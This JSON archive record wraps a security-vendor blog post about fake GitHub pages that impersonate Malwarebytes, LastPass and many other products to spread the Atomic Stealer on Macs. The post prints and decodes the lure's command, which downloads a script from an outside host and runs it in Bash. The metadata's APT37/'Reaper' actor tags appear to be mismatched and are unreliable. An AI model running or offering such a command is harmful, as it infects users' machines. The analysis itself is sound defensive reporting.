{ "id": "c1530010-ce0d-40e6-83ff-d668c3782559", "created_at": "2026-04-06T02:11:19.434012Z", "updated_at": "2026-04-10T03:38:06.629691Z", "deleted_at": null, "sha1_hash": "630d0db4ba89d6a54d48a993e27e8c94d727872a", "title": "Fake Malwarebytes, LastPass, and others on GitHub serve malware", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 514734, "plain_text": "Fake Malwarebytes, LastPass, and others on GitHub serve\r\nmalware\r\nBy Pieter Arntz\r\nPublished: 2025-09-23 · Archived: 2026-04-06 01:38:19 UTC\r\nFake versions of legitimate software are currently circulating on GitHub pages, in a large-scale campaign targeting\r\nMac users.\r\nUnfortunately, Malwarebytes for Mac is one of them.\r\nImpersonating brands is sadly commonplace, as scammers take advantage of established brand names to target\r\ntheir victims. So this is nothing new, but we always want to warn you about it when we see it happening.\r\nIn this case, the cybercriminals’ goal is to distribute information stealers. They figured out a while ago that the\r\neasiest way to infect Macs is to get users to install the malware themselves, and the Atomic Stealer (aka AMOS) is\r\nthe go-to information stealer for Macs.\r\nThe LastPass Threat Intelligence team has posted information about the campaign, which follows a similar pattern\r\nfor all the impersonated software. Sometimes, the starting point is a sponsored Google ad (did we mention we\r\ndon’t like them? Oh yes, we did!) that points to GitHub instead of the official page of the developer.\r\nBut in other, less obvious cases, you may see search results like these:\r\nhttps://www.malwarebytes.com/blog/news/2025/09/fake-malwarebytes-lastpass-and-others-on-github-serve-malware\r\nPage 1 of 7\n\nThese only came up at the top of the search results when I explicitly searched for “Malwarebytes Github MacOS”,\r\nbut the cybercriminals are known to have used Search Engine Optimization (SEO) techniques to get their listings\r\nhigher in the search results.\r\nThe idea is to get the aspiring user to click on the “GET MALWAREBYTES” button on the dedicated GitHub\r\npage.\r\nIf someone does click that button, they will end up on a download page with instructions on how to install the fake\r\nproduct, which is actually an information stealer.\r\nThe terminal installation instructions for Malwarebytes for Mac pointed to a recently registered domain, but\r\nthankfully our Browser Guard blocked it anyway.\r\nhttps://www.malwarebytes.com/blog/news/2025/09/fake-malwarebytes-lastpass-and-others-on-github-serve-malware\r\nPage 2 of 7\n\nHere’s a technical breakdown of the instructions provided to the visitor:\r\n/bin/bash -c \"\u003csomething\u003e\" runs a command using the Bash shell on macOS or Linux. Bash is the\r\ninterpreter for shell commands.\r\nThe part in quotes uses $( ... ) . Everything inside this gets executed first; its output becomes part of\r\nthe outer command.\r\n$(echo aHR0cHM6Ly9nb3NyZWVzdHIuY29tL2h1bi9pbnN0YWxsLnNo | base64 -d) echo ... | base64 -d\r\ndecodes the long string.\r\ncurl -fsSL is a command to download data from the web. The options mean:\r\n-f: Fail silently for HTTP errors.-s: Silent mode (no progress bar).-S: Show errors if -s is used.\r\n-L: Follow redirects.\r\nSo, putting all this together:\r\nThe inner command turns into: curl -fsSL https://gosreestr[.]com/hun/install.sh\r\nThe outer command becomes: /bin/bash -c \"$(curl -fsSL https://gosreestr[.]com/hun/install.sh)\"\r\nSo, the complete command tells the system to download a script directly from an external server and immediately\r\nexecute it using Bash.\r\nThis is dangerous for the user on many levels. Because there is no prompt or review, the user does not get a\r\nchance to see or assess what the downloaded script will do before it runs. It bypasses security because of the use\r\nhttps://www.malwarebytes.com/blog/news/2025/09/fake-malwarebytes-lastpass-and-others-on-github-serve-malware\r\nPage 3 of 7\n\nof the command line, it can bypass normal file download protections and execute anything the attacker wants.\r\nThe files to download have already been taken down, but users that recognize this chain of infection are under\r\nadvice to thoroughly check their machines for an infection.\r\nImpersonated software besides Malwarebytes and LastPass included:\r\n1Password\r\nActiveCampaign\r\nAfter Effects\r\nAudacity\r\nAuphonic\r\nBasecamp\r\nBetterSnapTool\r\nBiteable\r\nBitpanda\r\nBitsgap\r\nBlog2Social\r\nBlue Wallet\r\nBonkbot\r\nCarbon Copy Cloner\r\nCharles Schwab\r\nCitibank\r\nCMC Markets\r\nConfluence\r\nCoolors\r\nDaVinci Resolve\r\nDefiLlama\r\nDesktop Clockology\r\nDesygner\r\nDocker\r\nDropbox\r\nE-TRADE\r\nEigenLayer\r\nFidelity\r\nFliki\r\nFreqtrade Bot\r\nFreshworks\r\nGemini\r\nGMGN AI\r\nGunbot\r\nHemingway Editor\r\nHeyGen\r\nhttps://www.malwarebytes.com/blog/news/2025/09/fake-malwarebytes-lastpass-and-others-on-github-serve-malware\r\nPage 4 of 7\n\nHootsuite\r\nHTX\r\nHypertracker\r\nIRS\r\nKeyBank\r\nLightstream\r\nLoopback\r\nMaestro Bot\r\nMelon\r\nMetatrader 5\r\nMetricool\r\nMixpanel\r\nMp3tag\r\nMural\r\nNFT Creator\r\nNotchNook\r\nNotion\r\nObsidian\r\nOnlypult\r\nPendle Finance\r\nPepperstone\r\nPipedrive\r\nPlus500\r\nPrivnote\r\nProWritingAid\r\nPubler\r\nRaycast\r\nReaper\r\nRecurPost\r\nRenderforest\r\nRippling\r\nRiverside.fm\r\nRobinhood\r\nRug AI\r\nSage Intacct\r\nSalesloft\r\nSentinelOne\r\nShippo\r\nShopify\r\nSocialPilot\r\nSoundtrap\r\nStreamYard\r\nhttps://www.malwarebytes.com/blog/news/2025/09/fake-malwarebytes-lastpass-and-others-on-github-serve-malware\r\nPage 5 of 7\n\nSurferSEO\r\nThunderbird\r\nTweetDeck\r\nUphold\r\nVeeva CRM\r\nViraltag\r\nVSCO\r\nVyond\r\nWebull\r\nXai Games\r\nXSplit\r\nZealy\r\nZencastr\r\nZenefits\r\nZotero\r\nBut it’s highly likely that there will be more, so don’t see this as an exhaustive list.\r\nHow to stay safe\r\nBoth ThreatDown and Malwarebytes for Mac detect and block this Atomic Stealer variant and many others, but\r\nit’s better to not download it at all. There are a few golden guidelines on how to stay safe:\r\nNever run copy-pasted commands from random pages or forums even if they are on seemingly legitimate\r\nGitHub pages, and especially don’t use any that involve curl … | bash or similar combos.\r\nAlways download software from the official developer pages. If they do not host it themselves, verify the\r\ndownload links with them.\r\nAvoid sponsored search results. At best they cost the company you looked for money and at worst you fall\r\nprey to imposters.\r\nUse real-time anti-malware protection, preferably one that includes a web protection component.\r\nIf you have scanned your Mac and found the information stealer:\r\nRemove any suspicious login items, LaunchAgents, or LaunchDaemons from the Library folders to ensure\r\nthe malware does not persist after reboot.\r\nIf any signs of persistent backdoor or unusual activity remain, strongly consider a full clean reinstall of\r\nmacOS to ensure all malware components are eradicated. Only restore files from known clean backups.\r\nDo not reuse backups or Time Machine images that may be tainted by the infostealer.\r\nAfter reinstalling, check for additional rogue extensions, crypto wallet apps, and system modifications.\r\nChange all the passwords that were stored on the affected system and enable multi-factor authentication for\r\nyour important accounts.\r\nIf all this sounds too difficult for you to do yourself, ask someone or a company you trust to help you—our\r\nsupport team are happy to assist you if you have any concerns.\r\nhttps://www.malwarebytes.com/blog/news/2025/09/fake-malwarebytes-lastpass-and-others-on-github-serve-malware\r\nPage 6 of 7\n\nWe don’t just report on threats—we help safeguard your entire digital identity\r\nCybersecurity risks should never spread beyond a headline. Protect your, and your family’s, personal information\r\nby using identity protection.\r\nAbout the author\r\nWas a Microsoft MVP in consumer security for 12 years running. Can speak four languages. Smells of rich\r\nmahogany and leather-bound books.\r\nSource: https://www.malwarebytes.com/blog/news/2025/09/fake-malwarebytes-lastpass-and-others-on-github-serve-malware\r\nhttps://www.malwarebytes.com/blog/news/2025/09/fake-malwarebytes-lastpass-and-others-on-github-serve-malware\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.malwarebytes.com/blog/news/2025/09/fake-malwarebytes-lastpass-and-others-on-github-serve-malware" ], "report_names": [ "fake-malwarebytes-lastpass-and-others-on-github-serve-malware" ], "threat_actors": [ { "id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e", "created_at": "2025-08-07T02:03:25.082908Z", "updated_at": "2026-04-10T02:00:03.744649Z", "deleted_at": null, "main_name": "NICKEL FOXCROFT", "aliases": [ "APT37 ", "ATK4 ", "Group 123 ", "InkySquid ", "Moldy Pisces ", "Operation Daybreak ", "Operaton Erebus ", "RICOCHET CHOLLIMA ", "Reaper ", "ScarCruft ", "TA-RedAnt ", "Venus 121 " ], "source_name": "Secureworks:NICKEL FOXCROFT", "tools": [ "Bluelight", "Chinotto", "GOLDBACKDOOR", "KevDroid", "KoSpy", "PoorWeb", "ROKRAT", "final1stpy" ], "source_id": "Secureworks", "reports": null }, { "id": "9b02c527-5077-489e-9a80-5d88947fddab", "created_at": "2022-10-25T16:07:24.103499Z", "updated_at": "2026-04-10T02:00:04.867181Z", "deleted_at": null, "main_name": "Reaper", "aliases": [ "APT 37", "ATK 4", "Cerium", "Crooked Pisces", "G0067", "Geumseong121", "Group 123", "ITG10", "InkySquid", "Moldy Pisces", "Opal Sleet", "Operation Are You Happy?", "Operation Battle Cruiser", "Operation Black Banner", "Operation Daybreak", "Operation Dragon messenger", "Operation Erebus", "Operation Evil New Year", "Operation Evil New Year 2018", "Operation Fractured Block", "Operation Fractured Statue", "Operation FreeMilk", "Operation Golden Bird", "Operation Golden Time", "Operation High Expert", "Operation Holiday Wiper", "Operation Korean Sword", "Operation North Korean Human Right", "Operation Onezero", "Operation Rocket Man", "Operation SHROUDED#SLEEP", "Operation STARK#MULE", "Operation STIFF#BIZON", "Operation Spy Cloud", "Operation Star Cruiser", "Operation ToyBox Story", "Osmium", "Red Eyes", "Ricochet Chollima", "Ruby Sleet", "ScarCruft", "TA-RedAnt", "TEMP.Reaper", "Venus 121" ], "source_name": "ETDA:Reaper", "tools": [ "Agentemis", "BLUELIGHT", "Backdoor.APT.POORAIM", "CARROTBALL", "CARROTBAT", "CORALDECK", "Cobalt Strike", "CobaltStrike", "DOGCALL", "Erebus", "Exploit.APT.RICECURRY", "Final1stSpy", "Freenki Loader", "GELCAPSULE", "GOLDBACKDOOR", "GreezeBackdoor", "HAPPYWORK", "JinhoSpy", "KARAE", "KevDroid", "Konni", "MILKDROP", "N1stAgent", "NavRAT", "Nokki", "Oceansalt", "POORAIM", "PoohMilk", "PoohMilk Loader", "RICECURRY", "RUHAPPY", "RokRAT", "SHUTTERSPEED", "SLOWDRIFT", "SOUNDWAVE", "SYSCON", "Sanny", "ScarCruft", "StarCruft", "Syscon", "VeilShell", "WINERACK", "ZUMKONG", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775441479, "ts_updated_at": 1775792286, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/630d0db4ba89d6a54d48a993e27e8c94d727872a.pdf", "text": "https://archive.orkl.eu/630d0db4ba89d6a54d48a993e27e8c94d727872a.txt", "img": "https://archive.orkl.eu/630d0db4ba89d6a54d48a993e27e8c94d727872a.jpg" } }